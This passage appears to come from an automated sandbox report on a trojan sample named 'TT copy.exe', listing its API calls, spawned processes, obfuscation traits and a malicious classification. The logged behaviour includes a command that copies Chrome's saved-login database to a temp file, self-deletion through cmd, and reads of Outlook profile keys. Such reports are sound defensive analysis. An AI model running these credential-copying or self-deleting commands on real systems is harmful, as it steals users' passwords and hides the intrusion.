            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_052722AE15_2_052722AE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05264AEF15_2_05264AEF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D9B815_2_00F4D9B8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F3929015_2_00F39290
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F3928B15_2_00F3928B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F3DC3015_2_00F3DC30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4EDBB15_2_00F4EDBB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F32D9015_2_00F32D90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F32D8715_2_00F32D87
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F32FB015_2_00F32FB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4E79015_2_00F4E790
            Source: C:\Users\user\Desktop\TT copy.exeCode function: String function: 0106B150 appears 136 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 051AB150 appears 124 times
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A320 NtCreateFile,3_2_0041A320
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A3D0 NtReadFile,3_2_0041A3D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A450 NtClose,3_2_0041A450
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A500 NtAllocateVirtualMemory,3_2_0041A500
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A2DA NtCreateFile,3_2_0041A2DA
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A324 NtCreateFile,3_2_0041A324
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041A44A NtClose,3_2_0041A44A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_010A9910
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A99A0 NtCreateSection,LdrInitializeThunk,3_2_010A99A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9840 NtDelayExecution,LdrInitializeThunk,3_2_010A9840
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_010A9860
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_010A98F0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_010A9A00
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A20 NtResumeThread,LdrInitializeThunk,3_2_010A9A20
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A50 NtCreateFile,LdrInitializeThunk,3_2_010A9A50
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9540 NtReadFile,LdrInitializeThunk,3_2_010A9540
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A95D0 NtClose,LdrInitializeThunk,3_2_010A95D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9710 NtQueryInformationToken,LdrInitializeThunk,3_2_010A9710
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9780 NtMapViewOfSection,LdrInitializeThunk,3_2_010A9780
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_010A97A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9FE0 NtCreateMutant,LdrInitializeThunk,3_2_010A9FE0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_010A9660
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010A96E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9950 NtQueueApcThread,3_2_010A9950
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A99D0 NtCreateProcessEx,3_2_010A99D0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9820 NtEnumerateKey,3_2_010A9820
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AB040 NtSuspendThread,3_2_010AB040
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A98A0 NtWriteVirtualMemory,3_2_010A98A0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9B00 NtSetValueKey,3_2_010A9B00
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AA3B0 NtGetContextThread,3_2_010AA3B0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A10 NtQuerySection,3_2_010A9A10
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9A80 NtOpenDirectoryObject,3_2_010A9A80
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9520 NtWaitForSingleObject,3_2_010A9520
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AAD30 NtSetContextThread,3_2_010AAD30
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9560 NtWriteFile,3_2_010A9560
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A95F0 NtQueryInformationFile,3_2_010A95F0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AA710 NtOpenProcessToken,3_2_010AA710
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9730 NtQueryVirtualMemory,3_2_010A9730
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9760 NtOpenProcess,3_2_010A9760
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9770 NtSetInformationFile,3_2_010A9770
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010AA770 NtOpenThread,3_2_010AA770
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9610 NtEnumerateValueKey,3_2_010A9610
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9650 NtQueryValueKey,3_2_010A9650
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A9670 NtQueryInformationProcess,3_2_010A9670
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A96D0 NtCreateKey,3_2_010A96D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9540 NtReadFile,LdrInitializeThunk,15_2_051E9540
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E95D0 NtClose,LdrInitializeThunk,15_2_051E95D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9710 NtQueryInformationToken,LdrInitializeThunk,15_2_051E9710
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9780 NtMapViewOfSection,LdrInitializeThunk,15_2_051E9780
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9FE0 NtCreateMutant,LdrInitializeThunk,15_2_051E9FE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9610 NtEnumerateValueKey,LdrInitializeThunk,15_2_051E9610
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9650 NtQueryValueKey,LdrInitializeThunk,15_2_051E9650
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_051E9660
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E96D0 NtCreateKey,LdrInitializeThunk,15_2_051E96D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_051E96E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_051E9910
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E99A0 NtCreateSection,LdrInitializeThunk,15_2_051E99A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9840 NtDelayExecution,LdrInitializeThunk,15_2_051E9840
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_051E9860
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9B00 NtSetValueKey,LdrInitializeThunk,15_2_051E9B00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A50 NtCreateFile,LdrInitializeThunk,15_2_051E9A50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EAD30 NtSetContextThread,15_2_051EAD30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9520 NtWaitForSingleObject,15_2_051E9520
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9560 NtWriteFile,15_2_051E9560
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E95F0 NtQueryInformationFile,15_2_051E95F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EA710 NtOpenProcessToken,15_2_051EA710
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9730 NtQueryVirtualMemory,15_2_051E9730
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EA770 NtOpenThread,15_2_051EA770
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9770 NtSetInformationFile,15_2_051E9770
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9760 NtOpenProcess,15_2_051E9760
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E97A0 NtUnmapViewOfSection,15_2_051E97A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9670 NtQueryInformationProcess,15_2_051E9670
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9950 NtQueueApcThread,15_2_051E9950
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E99D0 NtCreateProcessEx,15_2_051E99D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9820 NtEnumerateKey,15_2_051E9820
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EB040 NtSuspendThread,15_2_051EB040
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E98A0 NtWriteVirtualMemory,15_2_051E98A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E98F0 NtReadVirtualMemory,15_2_051E98F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051EA3B0 NtGetContextThread,15_2_051EA3B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A10 NtQuerySection,15_2_051E9A10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A00 NtProtectVirtualMemory,15_2_051E9A00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A20 NtResumeThread,15_2_051E9A20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051E9A80 NtOpenDirectoryObject,15_2_051E9A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A3D0 NtReadFile,15_2_00F4A3D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A320 NtCreateFile,15_2_00F4A320
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A450 NtClose,15_2_00F4A450
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A500 NtAllocateVirtualMemory,15_2_00F4A500
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A2DA NtCreateFile,15_2_00F4A2DA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A324 NtCreateFile,15_2_00F4A324
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4A44A NtClose,15_2_00F4A44A
            Source: TT copy.exe, 00000000.00000002.293699875.0000000006E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCerbera.dll" vs TT copy.exe
            Source: TT copy.exe, 00000000.00000000.249696202.00000000005C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStreamingContextSta.exeJ vs TT copy.exe
            Source: TT copy.exe, 00000000.00000002.294087756.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs TT copy.exe
            Source: TT copy.exe, 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs TT copy.exe
            Source: TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000002.358925286.00000000012EF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000000.276422177.00000000005C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStreamingContextSta.exeJ vs TT copy.exe
            Source: TT copy.exe, 00000003.00000003.278076755.0000000000E1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000002.358488954.0000000000FFC000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs TT copy.exe
            Source: TT copy.exe, 00000003.00000003.286643479.0000000000FC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT copy.exe
            Source: TT copy.exeBinary or memory string: OriginalFilenameStreamingContextSta.exeJ vs TT copy.exe
            Source: TT copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: TT copy.exeVirustotal: Detection: 34%
            Source: TT copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\TT copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\TT copy.exe "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Users\user\Desktop\TT copy.exeProcess created: C:\Users\user\Desktop\TT copy.exe C:\Users\user\Desktop\TT copy.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\TT copy.exeProcess created: C:\Users\user\Desktop\TT copy.exe C:\Users\user\Desktop\TT copy.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT copy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT copy.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/2@16/9
            Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: TT copy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\TT copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
            Source: TT copy.exe, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.TT copy.exe.520000.0.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.TT copy.exe.520000.0.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.0.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.1.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.3.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.5.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.2.TT copy.exe.520000.1.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.7.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.2.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.TT copy.exe.520000.9.unpack, Fa/Vo.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\TT copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: TT copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: TT copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: TT copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: StreamingContextSta.pdb source: TT copy.exe
            Source: Binary string: wntdll.pdbUGP source: TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TT copy.exe, TT copy.exe, 00000003.00000002.358699164.000000000115F000.00000040.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.277558771.0000000000D05000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000003.283452054.0000000000EA1000.00000004.00000800.00020000.00000000.sdmp, TT copy.exe, 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.359728114.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.352750637.0000000004E4D000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: TT copy.exe, 00000003.00000002.358458771.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: TT copy.exe, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 0.0.TT copy.exe.520000.0.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 0.2.TT copy.exe.520000.0.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.0.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.1.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.3.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.5.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.2.TT copy.exe.520000.1.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.7.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.2.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 3.0.TT copy.exe.520000.9.unpack, Fa/Vo.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5D5C0 push C3FFFFE9h; ret 0_2_00E5D5E4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_00E5F750 push eax; iretd 0_2_00E5F751
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EB8561 pushfd ; ret 0_2_06EB8565
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE5F49 push es; ret 0_2_06EE5F60
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE6239 push es; iretd 0_2_06EE623C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE3201 push esp; iretd 0_2_06EE3202
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 0_2_06EE60BD push es; iretd 0_2_06EE60C8
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041BD87 push 7FF49B4Bh; retf 3_2_0041BD8D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D672 push eax; ret 3_2_0041D678
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D67B push eax; ret 3_2_0041D6E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D625 push eax; ret 3_2_0041D678
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0041D6DC push eax; ret 3_2_0041D6E2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_00417F2D push cs; retf 3_2_00417F37
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_004177BE push cs; retf 3_2_004177C4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010BD0D1 push ecx; ret 3_2_010BD0E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_051FD0D1 push ecx; ret 15_2_051FD0E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4BD87 push 7FF49B4Bh; retf 15_2_00F4BD8D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D6DC push eax; ret 15_2_00F4D6E2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D672 push eax; ret 15_2_00F4D678
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D67B push eax; ret 15_2_00F4D6E2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F4D625 push eax; ret 15_2_00F4D678
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F477BE push cs; retf 15_2_00F477C4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00F47F2D push cs; retf 15_2_00F47F37
            Source: TT copy.exeStatic PE information: 0xE98C9EE8 [Mon Mar 1 18:37:28 2094 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.8550082389

            Hooking and other Techniques for Hiding and Protection

            barindex
            Self deletion via cmd or bat file
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\TT copy.exe"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\TT copy.exe"Jump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
